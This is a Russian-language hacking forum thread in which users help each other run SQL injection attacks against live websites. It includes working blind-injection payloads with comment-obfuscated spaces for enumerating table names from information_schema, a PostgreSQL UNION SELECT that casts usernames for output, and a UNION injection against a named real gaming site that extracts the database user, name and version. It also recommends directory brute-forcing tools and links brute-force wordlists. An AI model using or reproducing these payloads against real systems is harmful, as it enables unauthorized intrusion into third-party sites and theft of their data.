Ваши вопросы по уязвимостям.

ну спс буду поковырят, если что составиш правильный запрос жду резултатов.
Вот тока не пойму как можно выводит sql запросы на браузер, тоесть что отправлю через гет пост и на какой запрос превращается

 

не могу подобрать именя таблиц и столбцов в 4ой версии (П.С. вывод виден только в исходном коде стр.), нужна Ваша помощь

 

Не подскажите пожалуйста хороший сканер для директорий сайта ..?

 

erolom, security-digger.org

 

wolmer, смахивает на DLE

 

Pelmeshko HEAD Scaner

 

х3, думаю покатит

 

проверь имя таблицы

 

2erolom DirBuster написан на Java лудшего пока не встречал в коплекте огромные словари

 

словарик..http://www.chestor92.ru/publ/slovari_dlja_bruta/1-1-0-47

 

хех не подумал что встречу 3ую ветку, спс за помощь ))

 

упс тут вроде не третая версия:
?script=%2527))/**/and/**/(version()/**/like/**/%25275%%2527)/*
на 5версию норм обрабатывает. Тока я не понял как теперь составит правильный запрос что вытянут имена из information_schema.tables если это реально конечно

 

ой извини дружище, писал на спешку уходя с офиса. Вот правильный запрос.
?script=%2527%29%29/**/and/**/substring%28version%28%29/**/from/**/1/**/for/**/1%29=5/*

На счёт дальнейшего перебора, мой вам совет, возьмите для начала что-нибудь по проще, толк будет намного больше, я серьёзно...
ps. а по поводу как именно перебирать, то здесь всё просто.
?script=%2527))/**/and/**/lower(ascii(substring((select(table_name)from(information_schema.tables)where/**/table_name=%2527CHARACTER_SETS%2527/**/LIMIT/**/1)/**/from/**/1/**/for/**/1)))=99/*

 

угу немного сложновато придется перебор, вот я саму конструкцию немного непонял. Где тут номер для второго символа ставит?
/LIMIT/**/2,1)/**/from/**/1/**/for/**/1)))=99/* не пашет так как на запятую ругается. Если бы запрос было таким: AND ascii(lower(substring(user(),4,1)))>110 то понятно что тут четвертый символ перебирается, но выше немного посложнее как видно и еще на запросе уже написан имя character_sets и зачем надо еще раз перебират если уже известно название ))

 

YuNi|[c,

https://forum.antichat.ru/showpost.php?p=1734696&postcount=12
https://forum.antichat.ru/showpost.php?p=1734851&postcount=13

 

PostgreSQL

как преобразовать тип данных для вывода информации?

 

использовать функцию cast, например:
UNION+SELECT+null,null,cast(username+as+text),null,null+from+users

 

грабли

 

Здравствуйте. Подскажите, вот допустим есть такая инъекция

Code:

http://arcadepod.com/shockwave/gotogame.php?id=2358 union select 1,2,3,4

если поставить "-" или например несуществующее значение переменной id, то редиректит на другую станицу с ошибкой.. можно ли как нить вывести нужные значения?

 

Code:

http://arcadepod.com/shockwave/gotogame.php?id=2358+and+null+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4